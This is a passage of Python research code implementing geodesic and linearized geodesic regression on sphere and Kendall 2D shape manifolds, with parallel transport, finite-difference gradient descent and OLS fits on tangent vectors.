if len( X ) == 0:
nManifoldDim = beta0.nDim
slope_tVec = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] = 0
print( len( Y ) )
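# "Poor man's Sasaki" transport: each group geodesic is discretized into L small steps, the group
# slope is carried along it step by step, and the population base point is propagated through L
# exponential steps whose directions average the groups' per-step contributions; a linearized
# geodesic regression over t0_list / g0_list then recovers the common intercept and slope.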
L = 1000
beta0_l_1 = beta0
v0_l_1 = manifolds.sphere_tVec( nManifoldDim )
for i in range( len( Y ) ):
Y_i = Y[ i ]
Y_i_l_1 = Y_i.ScalarMultiply( 1.0 / float( L ) )
Y_i_l_1_parT = p0_list[ i ].ParallelTranslateAtoB( p0_list[ i ], beta0_l_1, Y_i_l_1 )
for d in range( nManifoldDim ):
v0_l_1.tVector[ d ] += ( Y_i_l_1_parT.tVector[ d ] / float( len( Y ) ) )
g0_list = [ beta0_l_1 ]
v0_list = [ v0_l_1 ]
t0_list = [ 0 ]
for l in range( L ):
beta0_l = beta0_l_1.ExponentialMap( v0_l_1 )
g0_list.append( beta0_l )
t0_list.append( float( l + 1 ) / float( L ) )
v0_l = manifolds.sphere_tVec( nManifoldDim )
for i in range( len( Y ) ):
Y_i = Y[ i ]
p_i_l = p0_list[ i ].ExponentialMap( Y_i.ScalarMultiply( float( l + 1 ) / float( L ) ) )
Y_i_l = p0_list[ i ].ParallelTranslateAtoB( p0_list[ i ], p_i_l, Y_i.ScalarMultiply( 1.0 / float( L ) ) )
Y_i_l_parT = p_i_l.ParallelTranslateAtoB( p_i_l, beta0, Y_i_l )
for d in range( nManifoldDim ):
v0_l.tVector[ d ] += ( Y_i_l_parT.tVector[ d ] / float( len( Y ) ) )
v0_list.append( v0_l )
beta0_l_1 = beta0_l
v0_l_1 = v0_l
p, v0 = LinearizedGeodesicRegression_Sphere( t0_list, g0_list )
tangent_arr = [ ]
tangent_arr.append( v0 )
return p, tangent_arr
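# The covariate-dependent case is not handled by this PoorSasaki variant; it falls through to the
# placeholder return below.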
return 0
def MultivariateLinearizedGeodesicRegression_Sphere_BottomUp_PoorSasaki( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ][ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ][ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression_Sphere( t_list_g, pt_list_g )
print( "v_g.tVector" )
print( v_g.tVector )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ][ 0 ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ][ 0 ] )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Sphere( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
print( len (cov_slope_group_list ) )
print( len (v_group_list ) )
beta0, tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Sphere_PoorSasaki( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
##############################################################
## 2D Scale Kendall Shape space ##
##############################################################
def MultivariateLinearizedGeodesicRegression_ScaleKendall2D_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
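# The scale-and-shape space is treated component-wise: the scale part goes through the Euclidean
# bottom-up routine and the Kendall 2D shape part through the Kendall2D bottom-up routine; the two
# estimates are then recombined into scale_kendall2D points and tangent vectors.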
pt_shape_list = []
pt_scale_list = []
for i in range( len( pt_list ) ):
pt_shape_list_i = []
pt_scale_list_i = []
for j in range( len( pt_list[ i ] ) ):
pt_scale_list_i.append( pt_list[ i ][ j ].pt[ 0 ] )
pt_shape_list_i.append( pt_list[ i ][ j ].pt[ 1 ] )
pt_scale_list.append( pt_scale_list_i )
pt_shape_list.append( pt_shape_list_i )
beta0_scale, tangent_scale_intercept_arr, tangent_scale_slope_arr = MultivariateLinearizedGeodesicRegression_Euclidean_BottomUp( t_list, pt_scale_list, cov_intercept_list, cov_slope_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
beta0_kShape, tangent_kShape_intercept_arr, tangent_kShape_slope_arr = MultivariateLinearizedGeodesicRegression_Kendall2D_BottomUp( t_list, pt_shape_list, cov_intercept_list, cov_slope_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
beta0 = manifolds.scale_kendall2D( beta0_kShape.nPt )
beta0.SetPoint( [ beta0_scale, beta0_kShape ] )
tangent_intercept_arr = []
tangent_slope_arr = []
for i in range( len( tangent_kShape_intercept_arr ) ):
tangent_i = manifolds.scale_kendall2D_tVec( tangent_kShape_intercept_arr[ i ].nPt )
tangent_i.SetTangentVector( [ tangent_scale_intercept_arr[ i ], tangent_kShape_intercept_arr[ i ] ] )
tangent_intercept_arr.append( tangent_i )
for i in range( len( tangent_kShape_slope_arr ) ):
tangent_i = manifolds.scale_kendall2D_tVec( tangent_kShape_slope_arr[ i ].nPt )
tangent_i.SetTangentVector( [ tangent_scale_slope_arr[ i ], tangent_kShape_slope_arr[ i ] ] )
tangent_slope_arr.append( tangent_i )
return beta0, tangent_intercept_arr, tangent_slope_arr
##############################################################
## 2D Kendall Shape space ##
##############################################################
def MultivariateLinearizedGeodesicRegression_Kendall2D_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression( t_list_g, pt_list_g )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
# # Check R2
# mean_g = FrechetMean( pt_list[ g ] )
# sqDist_SG_sum = 0
# sqVar_sum = 0
# for i in range( len( pt_list[ g ] ) ):
# p_i = pt_list_g[ i ]
# t_i = t_list_g[ i ]
# slope_t_i = v_g.ScalarMultiply( t_i )
# est_p_i = p0_g.ExponentialMap( slope_t_i )
# tVec_est_p_i_to_p_i = est_p_i.LogMap( p_i )
# sqDist_i = tVec_est_p_i_to_p_i.normSquared()
# sqDist_SG_sum += sqDist_i
# tVec_mean_to_p_n = mean_g.LogMap( p_i )
# sqVar_n = tVec_mean_to_p_n.normSquared()
# sqVar_sum += sqVar_n
# R2_SG = 1 - ( sqDist_SG_sum / sqVar_sum )
# print( "Subject : " + str( g ) )
# print( str( nData_group[ g ] ) + " Obs." )
# print( R2_SG )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Kendall2D( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Kendall2D( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, cov_intercept_group_list, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Intercept_Kendall2D( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
if nParam == 0:
base = FrechetMean( Y )
tangent_arr = []
return base, tangent_arr
# The anchor point is chosen based on the last entry of the covariates
# A continuous variable, such as a genetic disease score, should be the last entry of the covariates
# If the data do not have a continuous covariate, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nPt
# Initial intercept point
init_Interp = manifolds.kendall2D( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.kendall2D_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d].append( tVec_j.tVector[k, d] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.kendall2D_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ 0, d ] = estModel_list[ d ].params[ 0 ]
v_to_base_on_p_anchor.tVector[ 1, d ] = estModel_list[ nManifoldDim + d ].params[ 0 ]
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.kendall2D_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.kendall2D_tVec( nManifoldDim )
tangent_t_n = manifolds.kendall2D_tVec( nManifoldDim )
for par in range( nParam ):
for k in range( 2 ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ k, d ] += ( new_tVec_arr[ par ].tVector[ k, d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_Kendall2D( X, Y, beta0, p0_list, tVec_intercept_arr, cov_intercept_list, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nPt
slope_tVec = manifolds.kendall2D_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for k in range( 2 ):
for d in range( nManifoldDim ):
slope_tVec.tVector[ k, d ] += ( Y_i_tilde.tVector[ k, d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for k in range( 2 ):
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ k, d ] - Y_i.tVector[ k, d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.kendall2D_tVec( nManifoldDim )
# Copy both rows of the 2 x nPt tangent vector
for kk in range( 2 ):
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ kk, d ] = slope_tVec.tVector[ kk, d ]
# Calculate Gradient
dE = np.zeros( ( 2, nManifoldDim ) )
energy_k = 0
# Calculate FDM
for kkk in range( 2 ):
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.kendall2D_tVec( nManifoldDim )
slope_neg_eps = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_neg_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_pos_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] + eps
slope_neg_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ kk, dd ] = float( slope_pos_eps_at_p_i.tVector[ kk, dd ] - slope_neg_eps_at_p_i.tVector[ kk, dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ kk, dd ] = slope_parT_p_i.tVector[ kk, dd ] - Y_i.tVector[ kk, dd ]
dE[ kkk, d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ kkk, d ] " )
print( dE[ kkk, d ] )
slope_tVec_updated.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - ( stepSize * dE[ kkk, d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
# Use kk for the coordinate row so the outer iteration counter k is not clobbered
for kk in range( 2 ):
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ kk, d ] - Y_i.tVector[ kk, d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter - 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nPt
w_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
Y_j = Y[ j ]
# Parallel translate a group-wise tangent vector to population-level intercept
beta_tVec_f_i = manifolds.kendall2D_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ j ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( 2 ):
for dd in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk, dd ] += ( est_beta_tt.tVector[ kk, dd ] * cov_intercept_list[ j ][ tt ] )
# f_j : intercept predicted for group j from the accumulated covariate contribution
f_j = beta0.ExponentialMap( beta_tVec_f_i )
Y_j_at_f_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], f_j, Y_j )
Y_j_tilde = f_j.ParallelTranslateAtoB( f_j, beta0, Y_j_at_f_j )
tVec_j = Y_j_tilde
# Parallel translate a group-wise tangent vector to population-level intercept
# tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d ].append( tVec_j.tVector[ k, d ] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_t.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_DirectKendall2D( X, Y, beta0, p0_list, tVec_intercept_arr, cov_intercept_list, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nPt
slope_tVec = manifolds.kendall2D_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for k in range( 2 ):
for d in range( nManifoldDim ):
slope_tVec.tVector[ k, d ] += ( Y_i_tilde.tVector[ k, d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for k in range( 2 ):
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ k, d ] - Y_i.tVector[ k, d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.kendall2D_tVec( nManifoldDim )
# Copy both rows of the 2 x nPt tangent vector
for kk in range( 2 ):
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ kk, d ] = slope_tVec.tVector[ kk, d ]
# Calculate Gradient
dE = np.zeros( ( 2, nManifoldDim ) )
energy_k = 0
# Calculate FDM
for kkk in range( 2 ):
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.kendall2D_tVec( nManifoldDim )
slope_neg_eps = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_neg_eps.tVector[ kk, dd ] = slope_tVec.tVector[ kk, dd ]
slope_pos_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] + eps
slope_neg_eps.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ kk, dd ] = float( slope_pos_eps_at_p_i.tVector[ kk, dd ] - slope_neg_eps_at_p_i.tVector[ kk, dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.kendall2D_tVec( nManifoldDim )
for kk in range( 2 ):
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ kk, dd ] = slope_parT_p_i.tVector[ kk, dd ] - Y_i.tVector[ kk, dd ]
dE[ kkk, d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
print( "dE[ kkk, d ] " )
print( dE[ kkk, d ] )
slope_tVec_updated.tVector[ kkk, d ] = slope_tVec.tVector[ kkk, d ] - ( stepSize * dE[ kkk, d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
# Use kk for the coordinate row so the outer iteration counter k is not clobbered
for kk in range( 2 ):
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ kk, d ] - Y_i.tVector[ kk, d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter - 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nPt
w_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d ].append( tVec_j.tVector[ k, d ] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ k * nManifoldDim + d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_t.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.kendall2D_tVec( nManifoldDim )
for k in range( 2 ):
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ k, d ] = estModel_list[ k * nManifoldDim + d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
#################################################################################
### Positive Real Numbers ###
